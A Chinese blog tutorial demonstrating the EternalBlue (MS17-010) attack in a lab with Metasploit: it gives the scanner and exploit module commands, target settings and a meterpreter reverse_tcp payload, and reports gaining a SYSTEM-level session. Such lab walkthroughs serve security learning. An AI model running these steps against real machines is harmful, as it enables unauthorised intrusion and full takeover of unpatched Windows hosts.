msf-永恒之蓝利用演示 - 小吕不忧伤

使用Msf演示永恒之蓝漏洞的利用过程

MSF的功能模块介绍 MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程

1、Auxiliary(辅助模块) 为渗透测试信息搜集提供了大量的辅助模块支持 2、Exploits(攻击模块) 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。 3、Payload(攻击载荷模块) 攻击成功后促使靶机运行的一段植入代码 4、Post (后渗透攻击模块) 收集更多信息或进一步访问被利用的目标系统 5、Encoders(编码模块) 将攻击载荷进行编码,来绕过防护软件拦截

永恒之蓝漏洞演示:

靶机网络信息

攻击机网络信息

连通性测试

msf数据库启用

启动

永恒之蓝漏洞测试

永恒之蓝的漏洞编号:ms17-010

根据漏洞名称搜索 : search ms17_010

辅助模块扫描目标 设置模块:use auxiliary/scanner/smb/smb_ms17_010

查看设置:options

设置所需信息

设置目标地址:set rhosts 192.168.174.129

目标端口默认是445, 如果用nmap端口扫描windows文件共享服务不是开放在445端口上面,那这里需要进行修改,set rport 目标端口

设置好了之后,run或者exploit 进行攻击

绿色的加号为可攻击

2、设置攻击模块对目标进行攻击 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

查看所需设置:options

设置所需信息:

设置目标地址:set RHOSTS 192.168.48.219

设置目标端口:set RPORT 445

设置payload:set payload windows/x64/meterpreter/reverse_tcp

设置本地地址:set LHOST 192.168.48.140

攻击:run或者exploit

攻击成功,成功拿到会话

查看目前权限 gutuid

系统权限

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值